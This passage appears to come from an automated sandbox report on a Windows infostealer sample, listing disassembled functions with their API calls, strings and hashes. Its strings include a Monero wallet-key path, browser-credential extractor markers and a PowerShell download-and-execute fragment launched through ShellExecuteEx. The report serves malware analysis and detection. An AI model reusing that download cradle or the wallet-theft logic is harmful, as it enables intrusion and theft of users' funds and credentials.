                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: String___crt$Typememset
                      • String ID:
                      • API String ID: 3530896902-3916222277
                      • Opcode ID: 0fb8ac3a25bff528bb6afd6388b60acfe202cc78b10dbf2a04dd6a42328e0659
                      • Instruction ID: 89187ce0524148e2668dff3509750b2aaa8599a50795446883aef609c9e635bc
                      • Opcode Fuzzy Hash: 0fb8ac3a25bff528bb6afd6388b60acfe202cc78b10dbf2a04dd6a42328e0659
                      • Instruction Fuzzy Hash: C44127B150079D5EDB258B24CD94FFBBBE89F05708F1448E9E98A86282D3719A44DFA0
                      Function 001D4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcat.KERNEL32(?,00E3DF68), ref: 001D47DB
                        • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 001D4801
                      • lstrcat.KERNEL32(?,?), ref: 001D4820
                      • lstrcat.KERNEL32(?,?), ref: 001D4834
                      • lstrcat.KERNEL32(?,00E2BAC0), ref: 001D4847
                      • lstrcat.KERNEL32(?,?), ref: 001D485B
                      • lstrcat.KERNEL32(?,00E3DBC0), ref: 001D486F
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001D8D90: GetFileAttributesA.KERNEL32(00000000,?,001C1B54,?,?,001E564C,?,?,001E0E1F), ref: 001D8D9F
                        • Part of subcall function 001D4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001D4580
                        • Part of subcall function 001D4570: RtlAllocateHeap.NTDLL(00000000), ref: 001D4587
                        • Part of subcall function 001D4570: wsprintfA.USER32 ref: 001D45A6
                        • Part of subcall function 001D4570: FindFirstFileA.KERNEL32(?,?), ref: 001D45BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID:
                      • API String ID: 2540262943-0
                      • Opcode ID: 39441d077660da5f5ead80a07f104a0802569cf020adc6eb4ae92ace270dd8c6
                      • Instruction ID: d86644bf480a9504559304edaf4c58deb2fb066a0193b420dae22adb1aee1610
                      • Opcode Fuzzy Hash: 39441d077660da5f5ead80a07f104a0802569cf020adc6eb4ae92ace270dd8c6
                      • Instruction Fuzzy Hash: 4831A2B6900308A7CB14FBB0DC85EED737CAB68300F40459AB359A6181EF70D789CB96
                      Function 001D2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 001D2D85
                      Strings
                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 001D2CC4
                      • ')", xrefs: 001D2CB3
                      • <, xrefs: 001D2D39
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 001D2D04
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      • API String ID: 3031569214-898575020
                      • Opcode ID: 28fb27328af6f5e1452f2cd63c2490b6dda03466b7ff163bf253588700af7174
                      • Instruction ID: f14373497f0ed7b2045fe34b72baa4f0a503aa8e4b807507772bb5e7e50ce7b3
                      • Opcode Fuzzy Hash: 28fb27328af6f5e1452f2cd63c2490b6dda03466b7ff163bf253588700af7174
                      • Instruction Fuzzy Hash: 26410271C502589ADB18FFA0C892BEDB774AF24300F80412AF416B7291EF742A4ADF95
                      Function 001C9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                      Download Yara Rule
                      APIs
                      • LocalAlloc.KERNEL32(00000040,?), ref: 001C9F41
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$AllocLocal
                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                      • API String ID: 4171519190-1096346117
                      • Opcode ID: ac5c9ebb1db4f21ea05ef886d4a89a861e740bac3ac67dc316b03a1bd60925f8
                      • Instruction ID: d7c7d85321c7e0ea8d25860a9f8a43d870a2bae6cbece0b09f7e3c920a4e8a0d
                      • Opcode Fuzzy Hash: ac5c9ebb1db4f21ea05ef886d4a89a861e740bac3ac67dc316b03a1bd60925f8
                      • Instruction Fuzzy Hash: C8616070A5024CEBDB24EFA4CC96FED7775AF65344F408018F90A9F281DBB4AA45CB52
                      Function 001D7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7E37
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D7E3E
                      • RegOpenKeyExA.ADVAPI32(80000002,00E2C5B0,00000000,00020119,?), ref: 001D7E5E
                      • RegQueryValueExA.ADVAPI32(?,00E3DA60,00000000,00000000,000000FF,000000FF), ref: 001D7E7F
                      • RegCloseKey.ADVAPI32(?), ref: 001D7E92
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: ef284aff2d569c0a7ad51919b3e232aba413d52306dbd0c4d037f8b9e751b40b
                      • Instruction ID: 4bc10193eca4f233887b4dac9e5cb9ab0a3ef1d14299b8f3812daaaa613f79e0
                      • Opcode Fuzzy Hash: ef284aff2d569c0a7ad51919b3e232aba413d52306dbd0c4d037f8b9e751b40b
                      • Instruction Fuzzy Hash: DA1151B2A44305EBD704DF94DE49F7FBBB8EB44710F10816AF605A7280D77458108BA1
                      Function 001D9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                      Download Yara Rule
                      APIs
                      • StrStrA.SHLWAPI(00E3DEC0,?,?,?,001D140C,?,00E3DEC0,00000000), ref: 001D926C
                      • lstrcpyn.KERNEL32(0040AB88,00E3DEC0,00E3DEC0,?,001D140C,?,00E3DEC0), ref: 001D9290
                      • lstrlen.KERNEL32(?,?,001D140C,?,00E3DEC0), ref: 001D92A7
                      • wsprintfA.USER32 ref: 001D92C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID: %s%s
                      • API String ID: 1206339513-3252725368
                      • Opcode ID: 0636a8665bae7fa4c9d1120187329a0f9c2c522becdce240a420428948bf6b2c
                      • Instruction ID: 17cf87003cb6de997d4fa22f5fbb02821d962f52197602027b91bd7d6d0bf984
                      • Opcode Fuzzy Hash: 0636a8665bae7fa4c9d1120187329a0f9c2c522becdce240a420428948bf6b2c
                      • Instruction Fuzzy Hash: E0010875500208FFCB04DFECC988EAE7BB9EB48350F108158F909AB240C775AA60DB96
                      Function 001C12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C12B4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001C12BB
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001C12D7
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001C12F5
                      • RegCloseKey.ADVAPI32(?), ref: 001C12FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: ed30376f409ac10d664352fd2aee6b983602db6b78e3fbba452902a446c9ce0d
                      • Instruction ID: b9860bd818a87fb5ca3d4598247d5803f0042beabe27c9b7ad51fde18877dd64
                      • Opcode Fuzzy Hash: ed30376f409ac10d664352fd2aee6b983602db6b78e3fbba452902a446c9ce0d
                      • Instruction Fuzzy Hash: BC0131BAA40308BBDB00DFE0DD49FAEB7B8EB48701F108169FA05A7280D6709A158F55
                      Function 001D6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 001D6663
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 001D6726
                      • ExitProcess.KERNEL32 ref: 001D6755
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      • Opcode ID: 3a2dc46ea4de034623795cd3e13fcf3ee75a70a9e310438fd0a6209be461c4af
                      • Instruction ID: 56becbcbe0349c3f8e53dd0b736f0491d0f0dbe23b6be2fc08a24b066e3b2a03
                      • Opcode Fuzzy Hash: 3a2dc46ea4de034623795cd3e13fcf3ee75a70a9e310438fd0a6209be461c4af
                      • Instruction Fuzzy Hash: 05312FB1801218ABDB14EB50DD91FDE7778AF54300F80519AF20977291DF746B48CF5A
                      Function 001D87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001E0E28,00000000,?), ref: 001D882F
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D8836
                      • wsprintfA.USER32 ref: 001D8850
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                      • String ID: %dx%d
                      • API String ID: 1695172769-2206825331
                      • Opcode ID: f4efc26e46c929e1a8958ef21b7f449abe5ebe9b06b835b6bc7899d17fd2a2cc
                      • Instruction ID: c5dc50422a25573887ff784cdb53f0e527ff25777a1ad9843462e4b32f33afa2
                      • Opcode Fuzzy Hash: f4efc26e46c929e1a8958ef21b7f449abe5ebe9b06b835b6bc7899d17fd2a2cc
                      • Instruction Fuzzy Hash: 762112B2A40308AFDB04DF94DD45FAEBBB8FB48711F104119F605B7280C7799911CBA5
                      Function 001D8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001D951E,00000000), ref: 001D8D5B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D8D62
                      • wsprintfW.USER32 ref: 001D8D78
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesswsprintf
                      • String ID: %hs
                      • API String ID: 769748085-2783943728
                      • Opcode ID: 6ee118ef627fd8d33aa4a02f19ed9d4cf0bc4348d6b439b433a2ade340de703f
                      • Instruction ID: c13457c5efcbb89115e05de464f4fe3640a04083dfb19cdf490072a8f501d2aa
                      • Opcode Fuzzy Hash: 6ee118ef627fd8d33aa4a02f19ed9d4cf0bc4348d6b439b433a2ade340de703f
                      • Instruction Fuzzy Hash: 70E0E675A50308BBD710EB94DD09E5D77B8EB44701F004164FD0997240DA719E549B56
                      Function 001CA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,00E3A280,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
